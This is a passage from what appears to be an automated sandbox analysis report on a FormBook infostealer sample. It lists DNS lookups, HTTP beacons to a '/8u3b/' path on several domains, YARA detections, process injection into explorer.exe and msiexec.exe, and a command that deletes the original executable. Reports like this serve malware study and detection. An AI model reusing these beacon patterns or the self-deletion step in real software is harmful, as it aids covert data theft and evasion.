                                                                              May 4, 2021 18:40:35.385313988 CEST53606898.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:37.547240973 CEST6420653192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:37.566108942 CEST5090453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:37.624808073 CEST53642068.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:37.639240026 CEST53509048.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:42.891275883 CEST5752553192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:42.952469110 CEST53575258.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:48.309123039 CEST5381453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:48.381818056 CEST53538148.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:54.461986065 CEST5341853192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:54.520982981 CEST53534188.8.8.8192.168.2.4
                                                                              May 4, 2021 18:41:00.170859098 CEST6283353192.168.2.48.8.8.8
                                                                              May 4, 2021 18:41:00.381505013 CEST53628338.8.8.8192.168.2.4
                                                                              May 4, 2021 18:41:05.823858023 CEST5926053192.168.2.48.8.8.8
                                                                              May 4, 2021 18:41:05.892970085 CEST53592608.8.8.8192.168.2.4
                                                                              May 4, 2021 18:41:11.189289093 CEST4994453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:41:11.250770092 CEST53499448.8.8.8192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              May 4, 2021 18:40:05.845329046 CEST192.168.2.48.8.8.80xc5d1Standard query (0)www.kayandbernard.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:11.368455887 CEST192.168.2.48.8.8.80x908eStandard query (0)www.palomachurch.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:17.135504961 CEST192.168.2.48.8.8.80x5848Standard query (0)www.fnatic-skins.clubA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:22.243833065 CEST192.168.2.48.8.8.80x8bdaStandard query (0)www.cats16.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:27.308279037 CEST192.168.2.48.8.8.80x8589Standard query (0)www.benleefoto.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:32.453119040 CEST192.168.2.48.8.8.80x17f9Standard query (0)www.web-evo.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:37.547240973 CEST192.168.2.48.8.8.80x7eb8Standard query (0)www.gb-contracting.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:42.891275883 CEST192.168.2.48.8.8.80x2eddStandard query (0)www.effectivemarketinginc.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.309123039 CEST192.168.2.48.8.8.80x5ec0Standard query (0)www.donelys.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:54.461986065 CEST192.168.2.48.8.8.80xf194Standard query (0)www.timbraunmusician.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:41:00.170859098 CEST192.168.2.48.8.8.80x7c0eStandard query (0)www.anygivenrunday.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:41:05.823858023 CEST192.168.2.48.8.8.80x13eaStandard query (0)www.mollysmulligan.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:41:11.189289093 CEST192.168.2.48.8.8.80xf6caStandard query (0)www.2000deal.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              May 4, 2021 18:40:05.918068886 CEST8.8.8.8192.168.2.40xc5d1No error (0)www.kayandbernard.comkayandbernard.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:40:05.918068886 CEST8.8.8.8192.168.2.40xc5d1No error (0)kayandbernard.com184.168.131.241A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:11.437558889 CEST8.8.8.8192.168.2.40x908eNo error (0)www.palomachurch.compalomachurch.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:40:11.437558889 CEST8.8.8.8192.168.2.40x908eNo error (0)palomachurch.com184.168.131.241A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:17.205519915 CEST8.8.8.8192.168.2.40x5848Name error (3)www.fnatic-skins.clubnonenoneA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:22.302524090 CEST8.8.8.8192.168.2.40x8bdaName error (3)www.cats16.comnonenoneA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:27.432954073 CEST8.8.8.8192.168.2.40x8589Server failure (2)www.benleefoto.comnonenoneA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:32.517307043 CEST8.8.8.8192.168.2.40x17f9Name error (3)www.web-evo.comnonenoneA (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:37.624808073 CEST8.8.8.8192.168.2.40x7eb8No error (0)www.gb-contracting.comgb-contracting.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:40:37.624808073 CEST8.8.8.8192.168.2.40x7eb8No error (0)gb-contracting.com34.102.136.180A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:42.952469110 CEST8.8.8.8192.168.2.40x2eddNo error (0)www.effectivemarketinginc.comeffectivemarketinginc.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:40:42.952469110 CEST8.8.8.8192.168.2.40x2eddNo error (0)effectivemarketinginc.com34.102.136.180A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)www.donelys.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:48.381818056 CEST8.8.8.8192.168.2.40x5ec0No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:40:54.520982981 CEST8.8.8.8192.168.2.40xf194No error (0)www.timbraunmusician.comtimbraunmusician.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:40:54.520982981 CEST8.8.8.8192.168.2.40xf194No error (0)timbraunmusician.com107.180.51.23A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:41:00.381505013 CEST8.8.8.8192.168.2.40x7c0eNo error (0)www.anygivenrunday.com172.247.179.61A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:41:05.892970085 CEST8.8.8.8192.168.2.40x13eaNo error (0)www.mollysmulligan.com3.13.31.214A (IP address)IN (0x0001)
                                                                              May 4, 2021 18:41:11.250770092 CEST8.8.8.8192.168.2.40xf6caNo error (0)www.2000deal.com2000deal.comCNAME (Canonical name)IN (0x0001)
                                                                              May 4, 2021 18:41:11.250770092 CEST8.8.8.8192.168.2.40xf6caNo error (0)2000deal.com34.102.136.180A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • www.kayandbernard.com
                                                                              • www.palomachurch.com
                                                                              • www.gb-contracting.com
                                                                              • www.effectivemarketinginc.com
                                                                              • www.donelys.com
                                                                              • www.timbraunmusician.com
                                                                              • www.anygivenrunday.com
                                                                              • www.2000deal.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.449760184.168.131.24180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:40:06.124053001 CEST5022OUTGET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.kayandbernard.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              May 4, 2021 18:40:06.357764959 CEST5024INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.16.1
                                                                              Date: Tue, 04 May 2021 16:40:06 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: https://www.zola.com/wedding/kayandbernard?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.449761184.168.131.24180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:40:11.893379927 CEST5519OUTGET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.palomachurch.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              May 4, 2021 18:40:12.124341011 CEST5520INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.16.1
                                                                              Date: Tue, 04 May 2021 16:40:12 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.palomachurch.org/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:40:37.667260885 CEST5532OUTGET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.gb-contracting.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              May 4, 2021 18:40:37.868899107 CEST5539INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Tue, 04 May 2021 16:40:37 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "6089bebd-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.44976534.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:40:42.996263027 CEST5542OUTGET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.effectivemarketinginc.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              May 4, 2021 18:40:43.289160967 CEST5542INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Tue, 04 May 2021 16:40:43 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "6089bebd-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.449766198.54.117.21680C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:40:49.213042974 CEST5543OUTGET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.donelys.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.449767107.180.51.2380C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:40:54.655491114 CEST5545OUTGET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.timbraunmusician.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              May 4, 2021 18:40:55.565521955 CEST5545INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 04 May 2021 16:40:54 GMT
                                                                              Server: Apache
                                                                              X-Powered-By: PHP/7.4.11
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              X-Redirect-By: WordPress
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Location: http://timbraunmusician.com/8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P
                                                                              Vary: User-Agent
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.449768172.247.179.6180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:41:00.597980022 CEST5546OUTGET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.anygivenrunday.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.44977034.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 4, 2021 18:41:11.294384956 CEST5549OUTGET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
                                                                              Host: www.2000deal.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              May 4, 2021 18:41:11.497021914 CEST5549INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Tue, 04 May 2021 16:41:11 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "6085c4a5-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: g1EhgmCqCD.exe PID: 7100 Parent PID: 5944

                                                                              General

                                                                              Start time:18:39:00
                                                                              Start date:04/05/2021
                                                                              Path:C:\Users\user\Desktop\g1EhgmCqCD.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\g1EhgmCqCD.exe'
                                                                              Imagebase:0x5b0000
                                                                              File size:665600 bytes
                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Analysis Process: g1EhgmCqCD.exe PID: 1748 Parent PID: 7100

                                                                              General

                                                                              Start time:18:39:11
                                                                              Start date:04/05/2021
                                                                              Path:C:\Users\user\Desktop\g1EhgmCqCD.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\g1EhgmCqCD.exe
                                                                              Imagebase:0xe60000
                                                                              File size:665600 bytes
                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Analysis Process: explorer.exe PID: 3424 Parent PID: 1748

                                                                              General

                                                                              Start time:18:39:14
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:
                                                                              Imagebase:0x7ff6fee60000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: msiexec.exe PID: 7036 Parent PID: 3424

                                                                              General

                                                                              Start time:18:39:36
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                              Imagebase:0x1230000
                                                                              File size:59904 bytes
                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:high

                                                                              Analysis Process: cmd.exe PID: 7028 Parent PID: 7036

                                                                              General

                                                                              Start time:18:39:40
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
                                                                              Imagebase:0x11d0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: conhost.exe PID: 7116 Parent PID: 7028

                                                                              General

                                                                              Start time:18:39:40
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >